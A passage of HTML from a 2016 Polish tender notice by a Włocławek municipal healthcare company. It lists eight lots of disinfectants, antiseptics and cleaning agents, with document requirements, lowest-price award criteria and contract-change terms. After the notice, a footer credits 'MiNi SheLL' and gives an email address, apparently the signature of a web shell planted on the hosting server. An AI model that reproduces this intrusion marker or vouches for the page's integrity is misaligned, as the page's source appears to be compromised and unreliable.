<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pisemne potwierdzenie spełnienia wymogów specyfikacji, poprzez dostarczenie wraz z ofertą folderów, broszur lub katalogów zawierających szczegółowy opis produktu, w tym wszystkie dane techniczne istotne dla medycznego zastosowania danego produkt, oraz ulotek informacyjnych oferowanych preparatów, w szczególności: 
- w zakresie wyrobów biobójczych:
ulotka produktu, aktualna karta charakterystyki substancji niebezpiecznej,
pozwolenie na dopuszczenie do obrotu produktem biobójczym - wydane przez Ministra Zdrowia lub pozwolenie na dopuszczenie do obrotu produktem biobójczym wydane przez Prezesa Urzędu Rejestracji (od 1 maja 2011 roku) ustawa z dnia 18 maja 2011 r. o Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych i Podmiotów (Dz. U. z 2011 r., Nr 82, poz. 451).
- w zakresie produktów leczniczych (jeśli jest to potrzebne): ulotka i treść etykiety (zatwierdzone przez Ministerstwo Zdrowia), charakterystyka produktu leczniczego, aktualna karta charakterystyki substancji niebezpiecznej,
pozwolenie na dopuszczenie do obrotu produktem leczniczym wydane przez Ministra Zdrowia lub pozwolenie na dopuszczenie do obrotu produktem leczniczym wydane przez Prezesa Urzędu Rejestracji (od 1 maja 2011 roku) ustawa z dnia 18 maja 2011 r. o Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych i Podmiotów (Dz. U. z 2011 r., Nr 82, poz. 451).
- w zakresie wyrobów medycznych: ulotka produktu, aktualna karta charakterystyki substancji niebezpiecznej, potwierdzenie dokonania powiadomienia lub potwierdzenie dokonania zgłoszenia lub potwierdzenie o przeniesieniu do bazy danych Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.
- w zakresie wyrobów kosmetycznych: ulotka produktu, potwierdzenie przekazania danych do krajowego Systemu Informowania o Kosmetykach wprowadzanych do obrotu na terytorium Rzeczpospolitej Polskiej zgodnie z ustawą z dnia 30 marca 2001 r. o kosmetykach (Dz.U. 2001 nr 42 poz. 473 z późniejszymi zmianami).
Dokumenty potwierdzające, iż przedmiot zamówienia został przebadany i odpowiada Normom Europejskim lub Normom Polskim (normy, co najmniej fazy II, dot. obszaru medycznego). W razie braku stosownych dokumentów potwierdzających, iż przedmiot zamówienia spełnia Normy Europejskie lub Normy Polskie, dopuszcza się alternatywnie badania zaakceptowane przez Państwowy Zakład Higieny lub wyniki badań wykonane przez akredytowane (notyfikacja, certyfikat jakości ISO) laboratoria z krajów UE.
W przypadku zaoferowania przez Wykonawcę produktu równoważnego w stosunku do określonego w SIWZ - próbki produktu, wraz z wymienieniem składu chemicznego oferowanego produktu, umożliwiające dokonanie oceny równoważności.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian do umowy w następujących okolicznościach:
- zmiana terminu wykonania zamówienia, w przypadku zaistnienia okoliczności, których Strony umowy nie mogły przewidzieć w dniu jej zawarcia (np. okoliczności wynikające z działania siły wyższej);
- wydłużenie terminu wykonania zamówienia, w przypadku niewykorzystania ilościowego przedmiotu umowy, z  zastrzeżeniem § 2 ust. 2 projektu umowy;
- zmniejszenie wynagrodzenia, w przypadku obniżenia przez Wykonawcę ceny przedmiotu umowy;
- zmiany warunków płatności na bardziej korzystne dla Zamawiającego (np. terminu płatności, na system ratalny); 
- zamiana produktu (np. na towar innego producenta) przy zachowaniu tożsamości jego parametrów i właściwości, w przypadku niedostępności na rynku spowodowanej np. zaprzestaniem produkcji.
Niedopuszczalne są takie zmiany postanowień zawartej Umowy oraz wprowadzenie do niej nowych postanowień niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mzoz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zespół Opieki Zdrowotnej Sp. z o.o.
ul. Jana Kilińskiego 16, pokój 46,
87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2016 godzina 14:00, miejsce: Miejski Zespół Opieki Zdrowotnej Sp. z o.o.
Sekretariat, II piętro, pok. 47
ul. Jana Kilińskiego 16, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - PIELĘGNACJA SKÓRY, ODKAŻANIE SKÓRY I RĄK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do pielęgnacji skóry rąk i ciała, do codziennego stosowania po dezynfekcji rąk, do regeneracji naskórka, postać emulsji wody w oleju, nie zawierający parabenów, barwników, kompatybilny z preparatem do 
dezynfekcji rąk, pH neutralne dla skóry, przebadany dermatologicznie. 
Opakowanie: 500 ml	- 200 Szt.
Preparat alkoholowy do chirurgicznej i higienicznej dezynfekcji rąk. Bez zawartości jodu. Zawierający składniki natłuszczające i nawilżające. Gotowy do użycia. Spektrum działania: B, Tbc, MRSA, F, V (HIV, HBV, HCV, 
Polio, Adeno, Noro, Rota, Vaccinia, Herpes simplex). Czas dezynfekcji od 30 sek. do  90 sek. Produkt leczniczy. Opakowanie: 500 ml. Preparat pasujący do dozowników typu Dermados. - 340 Szt.
Preparat alkoholowy do chirurgicznej i higienicznej dezynfekcji rąk. Bez zawartości jodu. Zawierający składniki natłuszczające i nawilżające. Gotowy do użycia. Spektrum działania: B, Tbc, MRSA, F, V (HIV, HBV, HCV, 
Polio, Adeno, Noro, Rota, Vaccinia, Herpes simplex). Czas dezynfekcji od 30sek. do  90 sek. Produkt leczniczy. Opakowanie: 100 ml. Zamawiający wyraża zgodę na zaoferowanie preparatu w opakowaniach 75 ml z 
odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia. - 80 Szt.
Preparat do odkażania skóry przed zabiegami, w postaci roztworu gotowego do użycia, zawierający mieszaninę alkoholi (etanolu, izopropanolu, benzylolu) oraz nadtlenek wodoru, bezbarwny, klarowny, aktywny wobec 
wszystkich mikroorganizmów i przetrwalników oraz wirusów w ciągu maks. 2 minut, przeznaczony do odkażania skóry przed zabiegami chirurgicznymi, iniekcjami, pobraniem krwi. Nie posiadający przeciwskazań do 
zastosowania u noworodków. Opakowanie: 500 ml z atomizerem. Zamawiający wyraża zgodę na zaoferowanie preparatu w opakowaniach o mniejszej pojemności z odpowiednim przeliczeniem ilości wskazanego 
przedmiotu zamówienia. - 200 Szt.
Preparat do odkażania skóry przed zabiegami, w postaci roztworu gotowego do użycia, zawierający mieszaninę alkoholi (etanolu, izopropanolu, benzylolu) oraz nadtlenek wodoru, bezbarwny, klarowny, aktywny wobec 
wszystkich mikroorganizmów i przetrwalników oraz wirusów w ciągu maks. 2 minut, przeznaczony do odkażania skóry przed zabiegami chirurgicznymi, iniekcjami, pobraniem krwi. Nie posiadający przeciwskazań do  
zastosowania u noworodków. Opakowanie: 1 litr. - 50 Szt.
Preparat w do profilaktyki przeciwgrzybicznej do dezynfekcji stóp, redukujący ryzyko infekcji grzybiczej skóry. Na bazie alkoholi i nadtlenku wodoru. Aktywny  w stosunku do grzybów i bakterii. Opakowanie: 350 ml z 
atomizerem. Zamawiający wyraża zgodę na zaoferowanie preparatu w opakowaniach 250 ml z odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia - 10 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - ŚRODKI DO MYCIA I DEZYNFEKCJI DUŻYCH POWIERZCHNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do dezynfekcji i mycia powierzchni i urządzeń sanitarnych, uwalniający aktywny chlor, w postaci rozpuszczalnych tabletek, aktywny wobec wszystkich mikroorganizmów i przetrwalników (w stężeniu 1 000 ppm 
Cl w ciągu 15 minut), w tym M. tuberculosis, C. difficile ( w stężeniu 10 000 ppm Cl w ciągu 15 minut), oraz wirusów (w tym Adeno, Polio, żółtaczki i HIV), przeznaczony również do mycia i dezynfekcji powierzchni 
zanieczyszczonych organicznie (w stężeniu 10 000 ppm CL w ciągu 15 minut) oraz powierzchni i urządzeń mających kontakt z żywnością. 
Opakowanie: minimalnie 150 tabletek - w przypadku zaoferowania opakowania o większej ilości tabletek Zamawiający wymaga odpowiedniego przeliczenia ilości wskazanego przedmiotu zamówienia. - 100 Szt.
Preparat do dezynfekcji dużych powierzchni, w postaci koncentratu, alkoholowy, z ewentualnym dodatkiem amin trzeciorzędowych i chlorku benzalkoniowego oraz substancji myjących, o szerokim spektrum, aktywny 
wobec bakterii (również Mycobacterium), drożdży, wirusów (również osłoniętych) w stężeniu 1% w czasie do 15 min.  Dopuszczony do stosowania na oddziałach noworodkowych i pediatrycznych, w obecności 
pacjentów oraz do powierzchni kontaktujących się z żywnością. 
Opakowanie: minimum 1 litr. - 50 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - ŚRODKI DO SZYBKIEGO MYCIA I DEZYNFEKCJI POWIERZCHNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat  alkoholowy przeznaczony do szybkiej dezynfekcji małych powierzchni i miejsc trudno dostępnych, gotowy do użycia. Nie zawierający aldehydów, QAV i pochodnych biguanidyny. Zawierający min. 3 subst. aktywne. Wymagana pozytywna opinia kliniczna IMiDz (lub instytutu równoważnego) do stosowania na oddziałach pediatrycznych. B,F - 1 min. Tbc - 5 min. V (HBV,HIV, Rota, Adeno) - 1 min. 
Pojemnik z atmizerem o pojemności: 1 litr. - 500 Szt.
Bezalkoholowe chusteczki do dezynfekcji powierzchni o właściwościach dezynfekcyjno - myjących, przeznaczone do stosowania na wszystkich powierzchniach i sprzętach medycznych (łącznie z głowicami USG) 
wrażliwych na działanie alkoholi. Nasączone roztworem QAV, wolne od aldehydów. Szerokie spektrum działania B, F, V(HIV, HBV, HCV, Noro). Czas działania - 1 min. Minimalny wymiar pojedynczej chusteczki do: 220 mm. Opakowanie: 200 szt. chusteczek w pojemniku.
Zamawiający wyraża zgodę na zaoferowanie przedmiotu zamówienia zawierającego w pojemniku mniejsza ilość chusteczek /minimalnie: 100 szt./ z odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia. - 50 Szt.
Bezalkoholowe chusteczki do dezynfekcji powierzchni o właściwościach dezynfekcyjno - myjących, przeznaczone do stosowania na wszystkich powierzchniach i sprzętach medycznych (łącznie z głowicami USG), 
wrażliwych na działanie alkoholi. Nasączone roztworem QAV, wolne od aldehydów. Szerokie spektrum działania B, F, V(HIV, HBV, HCV, Noro). Czas działania - 1 min. Minimalny wymiar pojedynczej chusteczki do 220 mm. Wkłady uzupełniające. Opakowanie: 200 szt. chusteczek.
Zamawiający wyraża zgodę na zaoferowanie przedmiotu zamówienia zawierającego w pojemniku mniejsza ilość chusteczek /minimalnie: 100 szt./ z odpowiednim przeliczeniem ilości wskazanego przedmiotu zamówienia. - 50 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - ŚRODKI DO MANUALNEJ DEZYNFEKCJI NARZĘDZI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat bezaldehydowy do mycia i dezynfekcji narzędzi medycznych, w postaci proszku do sporządzenia roztworu, na bazie aktywnego tlenu in statu nascendi, nie wymagający aktywatora, aktywny wobec wszystkich 
mikroorganizmów, ich przetrwalników  (w tym M. tuberculosis), oraz wirusów (w tym Polio, Adeno, Rota, Papova, HIV, żółtaczki) w ciągu 30 minut, przeznaczony do mycia i dezynfekcji narzędzi medycznych 
wykonanych z metalu, tworzyw sztucznych, szkła, gumy, oraz endoskopów medycznych.
Opakowanie: 2 kg - w przypadku zaoferowania opakowania o mniejszej wadze /minimum: 1 kg/ Zamawiający wymaga odpowiedniego przeliczenia ilości wskazanego przedmiotu zamówienia. - 55 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - ŚRODKI DO MANUALNEJ DEZYNFEKCJI WIERTEŁ STOMATOLOGICZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do dezynfekcji i czyszczenia wierteł stomatologicznych i precyzyjnych narzędzi obrotowych. Na bazie alkoholi i wodorotlenku potasu. Bez zawartości związków amoniowych i aldehydów. Nie wymagający spłukiwania narzędzi wodą po przeprowadzonej dezynfekcji. Spektrum działania B, Tbc, F, V (Polio, HBV, HIV, HCV, Papova, Adeno, Vaccinia) w czasie do 30 minut. Gotowy do użycia. Bez aktywatora. Wyrób medyczny. Opakowanie: 2 litry. - 30 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 - ŚRODKI DO ANTYSEPTYKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do dezynfekcji błon śluzowych; substancja aktywna dichlorowodorek octenidyny, gotowy do użycia. Spektrum działania B (łącznie z MRSA, Chlamydia trachomatis), F, V(HIV, HBV, HCV). Czas działania: 60 sek. Wielkość opakowania: 50 ml - 150 Szt.
Preparat do dezynfekcji błon śluzowych; substancja aktywna dichlorowodorek octenidyny, gotowy do użycia. Spektrum działania B (łącznie z MRSA, Chlamydia trachomatis), F, V(HIV, HBV, HCV). Czas działania: 60 sek. Wielkość opakowania: 250 ml - 100 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7 - ŚRODKI DO ZMYWAREK I POZOSTAŁYCH MASZYN MYJĄCYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uniwersalny płyn myjący, silnie zasadowy, z aktywnym chlorem. Skutecznie usuwający resztki zaschniętego jedzenia oraz wszelkiego rodzaju przebarwienia. Odpowiedni do wszystkich naczyń i sztućców wykonanych 
ze szkła, porcelany, plastiku i stali nierdzewnej. Do stosowania we wszystkich typach zmywarek. Opakowanie: 12 kg - 5 Opakowań
Sól do filtra - preparat chroniący zmywarkę przed osadzaniem się kamienia w jej wnętrzu i na mytych naczyniach. zmiękczający wodę,  zawierający całkowicie rozpuszczalną szlachetną sól z granulkami o odpowiedniej 
wielkości. Preparat kompatybilny ze uniwersalnym płynem myjącym i z płynem nabłyszczającym. Opakowanie: 25 kg - 4 Opakowania
Środek do maszynowego mycia podłóg, typu TOP EFEKT STR - lub równoważny, stosowany do powierzchni elastycznych oraz żywicznych, niskopieniący, alkaliczny, rozpuszczający zanieczyszczenia pochodzenia 
tłuszczowego i olejowego, pH 13. Opakowanie: 10 litrów. - 3 Opakowania
Środek myjąco-pielęgnujący na bazie alkoholu, do maszynowego mycia podłóg, typu TOP EFEKT - lub równoważny, stosowany do powierzchni polimerowych, posadzek wodoodpornych oraz powierzchni półmatowych. Środek o przyjemnym zapachu, szybkoschnący, nie pozostawiający smug i zacieków, pH 8. Opakowanie: 10 litrów. - 2 Opakowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8 - ŚRODKI DO MASZYNOWEGO MYCIA I DEZYNFEKCJI SPRZĘTU MEDYCZNEGO W MYJNIACH I DEZYNFEKATORACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyn płucząco-odkamieniający typu Doyen SK 22E  - lub równoważny, o lekko kwaśnym odczynie, zapobiegający osadzaniu się kamienia w naczyniach, komorze płuczącej i przewodach rurowych. Skuteczny przy wszystkich stopniach twardości wody. Do stosowania w urządzeniach dezynfekcyjnych i czyszczących z dezynfekcją termiczną. Spełnia zalecenia Zarządzenia Unii Europejskiej o detergentach 648/2004/EG oraz ustawy o środkach myjąco-czyszczących (WRMG). Nie zawiera fosforanów i fosfonianów. 
Opakowanie: 5 litrów. - 5 Opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com